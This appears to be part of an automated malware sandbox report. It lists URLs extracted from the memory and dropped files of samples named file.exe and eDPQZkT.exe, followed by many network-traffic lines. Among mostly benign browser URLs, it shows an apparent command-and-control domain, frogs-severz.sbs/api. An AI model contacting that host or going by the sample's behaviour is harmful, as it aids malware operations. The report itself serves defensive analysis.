Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log5.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_476.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_476.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_476.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_476.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs/
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs//
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs/0
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs/api
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs:443/api
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogs-severz.sbs:443/apiN
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://gaana.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://m.kugou.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://m.soundcloud.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://m.vk.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: Cookies.10.dr String found in binary or memory: https://msn.comXID/
Source: Cookies.10.dr String found in binary or memory: https://msn.comXIDv10q
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://music.amazon.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://music.apple.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log4.9.dr String found in binary or memory: https://ntp.msn.com
Source: 000003.log10.9.dr String found in binary or memory: https://ntp.msn.com/
Source: 000003.log10.9.dr String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.9.dr String found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.9.dr, 000003.log10.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log10.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: QuotaManager.9.dr String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://open.spotify.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/0/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/0/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_476.5.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://srtb.msn.com/
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://support.mozilla.org
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://tidal.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.dr String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.dr String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.9.dr String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://vibe.naver.com/today
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://web.telegram.org/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://web.whatsapp.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, HJJJDAEG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: content_new.js.9.dr, content.js.9.dr String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6aeb00b7-1fab-414e-ab66-458ed8f652df.tmp.10.dr, 6a854b32-01e2-4583-8db8-2999f2ad48ba.tmp.10.dr String found in binary or memory: https://www.googleapis.com
Source: chromecache_476.5.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_476.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_476.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.iheart.com/podcast/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.instagram.com
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.last.fm/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.messenger.com
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/GCBKFIDHIEBK
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2001894530.0000000000557000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2001894530.0000000000557000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1901239020.00000000238EF000.00000004.00000020.00020000.00000000.sdmp, IJEHIDHDAKJDHJKEBFIEHCAAEH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2001894530.0000000000474000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.office.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.tiktok.com/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://www.youtube.com
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://y.music.163.com/m/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61133 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 61144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 61122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 61145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61156 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 61108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 61167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 61134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 61086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61135 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61105
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61109
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61100
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61101
Source: unknown Network traffic detected: HTTP traffic on port 61124 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61103
Source: unknown Network traffic detected: HTTP traffic on port 61147 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61104
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61118
